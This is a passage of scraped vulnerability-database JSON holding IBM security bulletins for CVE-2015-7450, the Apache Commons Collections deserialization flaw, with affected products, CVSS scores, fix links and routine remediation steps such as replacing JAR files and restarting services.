"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:17", "id": "B45ABED8BD58C33A07263A55AF5D4FCACA1D1D4D41B9076C9B3E26F4C663C536", "href": "https://www.ibm.com/support/pages/node/272089", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Integration Designer.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affects IBM Integration Designer V7.5.1_.x_ to V8.5.6_.x_ releases.\n\n## Remediation/Fixes\n\nTo fully mitigate these vulnerabilities, an additional fix (JR54738) is required for the following product versions: \n\n\n * [IBM Integration Designer V7.5.1.2](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Integration+Designer&release=7.5.1.2&platform=All&function=aparId&apars=JR54738>)\n * [IBM Integration Designer V8.0.1.3](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Integration+Designer&release=8.0.1.3&platform=All&function=aparId&apars=JR54738>)\n * 
[IBM Integration Designer V8.5.0.1](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Integration+Designer&release=8.5.0.1&platform=All&function=aparId&apars=JR54738>)\n * [IBM Integration Designer V8.5.5.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.5.0-WS-IID-IFJR54738>)\n * [IBM Integration Designer V8.5.6.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.6.0-WS-IID-IFJR54738>)\n\n## Workarounds and Mitigations\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:13", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Integration Designer (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:13", "id": 
"B0975AA1A2F8C9642F2AAC1300570E8A89FBFFD7FD121D262C86CE50246143F1", "href": "https://www.ibm.com/support/pages/node/272375", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere DataPower XC10 Appliance. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nWebSphere DataPower XC10 Appliance versions 2.1 and 2.5 at all firmware levels.\n\n## Remediation/Fixes\n\nApply an interim fix, according to the table below.** **Interim fixes are associated with the original APAR that is documented in the table. Because these APAR references might be updated to more recent APARs, see the links in the table for the most recent interim fix information. 
\n \n \n\n\n_Product_| _Version_| _APAR_| _Link to interim fix_ \n---|---|---|--- \nWebSphere DataPower XC10 Appliance V2.1 on appliance 9235-92X| 2.1.0| IT12206| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all>) \nWebSphere DataPower XC10 Appliance V2.1 on appliance 7199-92X| 2.1.0| IT12206| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all>) \nWebSphere DataPower XC10 Appliance V2.5 on appliance 7199-92X \n| Version 2.5.0 with SSD drivers ** \nImportant**: See More Information link and follow instructions to determine if you have an old or newer SSD driver on your appliance using the show ssd-version command.| IT12206| [http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all>) \nWebSphere DataPower XC10 Appliance V2.5 virtual image| 2.5.0| IT12206| 
[http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nThere is no workaround. The interim fix must be applied to correct the problem.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects WebSphere DataPower XC10 Appliance (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "4E5D6197DE489CCF6101834752B8C44441B42156C490BD2B4BCF76A0B812636E", "href": "https://www.ibm.com/support/pages/node/272243", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:31", "description": "## Summary\n\nTivoli Common Reporting is shipped as a component of IBM Systems Director Editions. 
Information about a security vulnerability affecting Tivoli Common Reporting has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletins listed below for the vulnerability details of the affected products.\n\n## Affected Products and Versions\n\n**Affected Product and Version(s)**\n\n| \n\n**Product and Version shipped as a component**\n\n| \n\n**Security Bulletin** \n \n---|---|--- \nIBM Systems Director Editions 6.3.0.0| Tivoli Common Reporting 2.1.1| <http://www-01.ibm.com/support/docview.wss?uid=swg21972799> \nIBM Systems Director Editions 6.3.2.0| Tivoli Common Reporting 3.1| <http://www-01.ibm.com/support/docview.wss?uid=swg21972799> \n \n## Remediation/Fixes\n\nFollow the instructions in the Security Bulletin listed above.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-18T01:30:23", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in\u00a0Tivoli Common Reporting\u00a0shipped with IBM Systems Director Editions.(CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:30:23", "id": "84ADA1A0F9193EF446D20A2AE6CBA8AD78BD934525DE84341357005D9E20113E", "href": "https://www.ibm.com/support/pages/node/682023", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T21:53:30", "description": "## Summary\n\nA security vulnerability has been identified in the current levels of IBM Platform Application Center Standard Edition 9.1.4, 9.1.4.1 and 9.1.4.2 that could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPlatform Application Center Standard Edition Version 9.1.4, 9.1.4.1, 9.1.4.2\n\n## Remediation/Fixes\n\n**Upgrade Application Center with the fix patch 380076 for 9.1.4.2**\n\n1\\. Download IBM Platform Application Center 9.1.4.2 fix patch 380076 from IBM fix central. Link: [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Application+Center&release=9.1.4.2&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Application+Center&release=9.1.4.2&platform=All&function=all>)\n\n2\\. Upgrade IBM Platform Application Center with this patch according to the upgrade guide: [_http://www-01.ibm.com/support/knowledgecenter/SSGSCT_9.1.4/shared_files/upgrading.dita_](<http://www-01.ibm.com/support/knowledgecenter/SSGSCT_9.1.4/shared_files/upgrading.dita>)\n\n## Workarounds and Mitigations\n\n**Manually apply the Apache jar File for 9.1.4, 9.1.4.1 and 9.1.4.2**\n\n1\\. Download Apache Commons Collections 3.2.2 from [_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>)\n\n2\\. Extract the file `commons-collections-3.2.2.jar` file and copy the extracted files to the management node. \n\n3\\. Back up your existing JAR files and replace them with the Apache Commons Collections 3.2.2 files. 
The existing JAR files that need to be replaced, include: \n\n`\u00b7 /opt/pac/perf/1.2/lib/commons-collections-3.1.jar `\n\n`\u00b7 /opt/pac/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/commons-collections-3.2.1.jar `\n\n`\u00b7 /opt/pac/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/commons-collections-3.2.2.jar `\n\nIf high availability is enabled, replace the above JAR file on the **all Application Center Server nodes. **\n\n4\\. Restart services. If high availability is enabled, run the following commands on **the active management nodes**.\n\n \n`# perfadmin stop all `\n\n`# pmcadmin stop `\n\n`# perfadmin start all `\n\n`# pmcadmin start `\n\nIf high availability is not enabled, run the following commands on the **all Application Center Server nodes.**\n\n`# perfadmin stop all `\n\n`# pmcadmin stop `\n\n`# perfadmin start all `\n\n`# pmcadmin start`\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:30:26", "type": "ibm", "title": "Security Bulletin: IBM Platform Application Center Standard Edition is affected by a security vulnerability (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:30:26", "id": "D25FC5FB8A8B1C59AB072CD2FAFBE0E65B654246DF1F523B2F0760F380BBA57D", "href": "https://www.ibm.com/support/pages/node/682063", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:56", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Developer for i, Rational Developer for AIX and Linux and Rational Developer for Power Systems Software.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Product Name**\n\n| **Versions Affected** \n---|--- \nRational Developer for Power Systems Software| 8.0, 8.0.0.1, 8.0.0.2, 8.0.0.3, 8.0.3, 8.0.3.1, 8.5, 8.5.1 \nRational Developer for i| 9.0, 9.0.0.1, 9.0.1, 9.1, 9.1.1, 9.1.1.1, 9.5, 9.5.0.1 \nRational Developer for AIX and Linux, AIX COBOL Edition| 9.0, 9.0.0.1, 9.0.1, 9.1, 9.1.1, 9.1.1.2 \nRational Developer for AIX and Linux, C/C++ Edition| 9.0, 9.0.0.1, 9.0.1, 9.1, 9.1.1, 9.1.1.2 \n \n## Remediation/Fixes\n\nUpdate the tools relying on batik in the product to address this vulnerability: \n \n\n\n**Product**| **VRMF**| **Remediation/First Fix** \n---|---|--- \nApply the fix from the corresponding version of Rational Application 
Developer to your affected product version.| 8.0.x, 8.5.x, 9.0.x, 9.1.x and 9.5.x| \n\n * A fix is available in the [_RDi 9.5.1.1 Fix Pack_](<http://www.ibm.com/support/docview.wss?uid=swg24043183>). \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Developer for i, Rational Developer for AIX and Linux and Rational Developer for Power Systems Software (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-08-03T04:23:43", "id": "5FDFAE3378B94695C361E1304FEE4C2C4F92EC0924C89C3F18E53B852DEDD45C", "href": "https://www.ibm.com/support/pages/node/273023", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:40:05", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. 
Information about security vulnerabilities affecting WAS has been published in security bulletins.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, ClearCase Remote Client (CCRC) WAN server component.\n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x:**\n\n * These vulnerabilities only apply to the CCRC WAN server component, and only for certain levels of WebSphere Application Server.\n\n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS) which is shipped with IBM Rational ClearCase.\n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** | **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearCase, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x | IBM WebSphere Application Server version 9.0. | \n\n[Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>) \n \n**ClearCase Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x | \n\n 1. Determine the WAS version used by your CCRC WAN server. Navigate to the CCRC profile directory (either the profile you specified when installing ClearCase, or `<ccase-home>/common/ccrcprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section. Check your installed version of IBM WebSphere Application Server against this bulletin's list of vulnerable versions.\n 2. Identify the latest available fixes (per the bulletin(s) listed above) for the version of WAS used for CCRC WAN server.\n 3. 
Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n \n_For 8.0.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-03T21:11:35", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-03T21:11:35", "id": "2AD55644A16B08DC4CD7D5B0074C944128455FA5FB38A6CCCF95596E90E15198", "href": "https://www.ibm.com/support/pages/node/1119363", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T21:54:35", "description": "## Summary\n\nWebsphere Application Server is shipped with Predictive Customer Intelligence. 
Information about a security vulnerability affecting Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes\n\n## Affected Products and Versions\n\nPredictive Customer Intelligence versions 1.0, 1.0.1, 1.1, 1.1.1, 1.1.2 \n\n \n\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)| Affected Supporting Product and Versions| Affected Supporting Product Security Bulletin \n---|---|--- \nPredictive Customer Intelligence 1.0 and 1.0.1| Websphere Application Server 8.5.5| [IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 (CVE-2015-7450)](<https://www.ibm.com/support/pages/vulnerability-apache-commons-affects-ibm-websphere-application-server-community-edition-v3004-cve-2015-7450> \"IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 \\(CVE-2015-7450\\)\" ) \nPredictive Customer Intelligence 1.1 and 1.1.1| Websphere Application Server 8.5.5.6| [IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 (CVE-2015-7450)](<https://www.ibm.com/support/pages/vulnerability-apache-commons-affects-ibm-websphere-application-server-community-edition-v3004-cve-2015-7450> \"IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 \\(CVE-2015-7450\\)\" ) \nPredictive Customer Intelligence 1.1.2| Websphere Application Server 9.0.0.4| [IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 (CVE-2015-7450)](<https://www.ibm.com/support/pages/vulnerability-apache-commons-affects-ibm-websphere-application-server-community-edition-v3004-cve-2015-7450> \"IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere 
Application Server Community Edition v3.0.0.4 \\(CVE-2015-7450\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-23T20:01:07", "type": "ibm", "title": "Security Bulletin: A Security Vulnerability has been Identified in Websphere Application Server Shipped with Predictive Customer Intelligence (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-06-23T20:01:07", "id": "B61AB1D0CA790E1ACAC9798122DF79FFCF9B8B2580CDC33E702C953B7EF6B140", "href": "https://www.ibm.com/support/pages/node/6237862", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:31", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Application Server on Cloud.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThe following Versions of IBM Application Server on Cloud may be affected: \n\n * Version 8.5.5 WAS Liberty Core, WAS Base and WAS ND \n * Version 8.0 \n\n## Remediation/Fixes\n\nTo patch an existing instance refer to the IBM WebSphere Application Server bulletin:_ \n_[_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \n \nAlternatively, delete the vulnerable instance and create a new instance. The new maintenance will be included.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:19", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Application Server on Cloud (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:19", "id": "B4CC3711A9BC627824CDE5B5B14754E035464BAB4BED480517573FA4510105A9", "href": "https://www.ibm.com/support/pages/node/273627", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:59", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Tivoli Netcool Performance Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [](<http://www-01.ibm.com/support/docview.wss?uid=swg21701503>)[_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nTivoli Netcool Performance Manager 1.4.1| IBM WebSphere Application Server 8.5.0.1 \nTivoli Network Performance Manager 1.4| IBM WebSphere version 8.5.0.1 (Bundled in the Jazz for Service Management version 1.1.0.2) \nTivoli Network Performance Manager 1.3.3| IBM WebSphere version 7.0.0.x (Bundled the TIP version 2.1.0.x) \nTivoli Network Performance Manager 1.3.2| IBM WebSphere version 7.0.0.x (Bundled in the TIP version 2.1.0.x) \nTivoli Network Performance Manager 1.3.1| IBM WebSphere version 7.0.0.x (Bundled in the TIP version 2.1.0.x) \n \n## Remediation/Fixes\n\nRemediation is available at the security bulletin [](<http://www-01.ibm.com/support/docview.wss?uid=swg21701503>)[_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n\n## ", "cvss3": 
